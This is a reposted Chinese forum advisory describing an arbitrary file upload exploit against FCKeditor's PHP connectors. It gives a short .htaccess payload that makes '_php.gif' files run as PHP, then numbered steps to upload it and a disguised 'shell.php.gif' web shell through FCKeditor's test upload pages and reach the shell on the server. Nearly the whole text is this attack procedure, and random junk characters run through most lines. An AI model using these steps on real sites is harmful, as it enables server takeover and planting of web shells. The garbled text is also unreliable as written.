FCKeditor所有php版本Upload上传漏洞
! }. a- H8 B* Z! I* P0 ^作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07- y( H; `) I g
减小字体 增大字体
6 ^+ g8 q7 p }, a, F) M. f[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
( }, z7 k) g6 N3 j2 @[+] Date: 2011
5 C6 _" K3 R/ j" T1 p2 x6 K[+] Author : sinesafe.cn9 V7 X& h+ e! z3 U& L. h' {7 ~) ~
[+] Website : WwW.sinesafe.cn h* r- h4 C% s; m) G( p- E
———————————————————
7 u( {" ~3 j# ]1.create a htaccess file:1 b& {2 M0 `: C
code:' n" Y* E: H: l& T' e1 G
<FilesMatch “_php.gif”>
& c9 F. h( q4 |, e! Q4 vSetHandler application/x-httpd-php
" L( M1 T" @6 b# w7 k- T0 |; L( B</FilesMatch>8 p/ P) x2 J7 I5 v* |5 B
4 n+ \$ z1 Z, M; E3 s/ b3 a- B+ V2.Now upload this htaccess with FCKeditor.
( H- W, m2 ^+ \. h5 o! J
. H# Y' m! E, \- O8 Q! }( chttp://www.sinesafe.cn/FCKeditor ... er/upload/test.html1 P' f: Q6 l2 G& _
1 y! U2 m5 c2 D, w; }http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
5 P% T6 L+ z' ^) G5 A: i V4 i4 ?6 r2 C/ v Y* k# T
———————————————————————————————-1 @" F% T! Q9 }6 c
3.Now upload shell.php.gif with FCKeditor.
" G) }4 W+ \7 O! S. b4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.. L) U) ]3 o& K; B: x
5.http://www.sinesafe.cn/anything/shell_php.gif8 @) f1 e8 k8 f7 u* s7 H, v
6.Now shell is available from server. |
r) i! D3 k5 U; k4 x2 e- ^
# v3 |" I! r( E$ t. F4 O2 N
- N7 J" G* a+ t; V$ _9 c0 J- x |
发表于 2013-10-27 17:25:21
收藏
支持
反对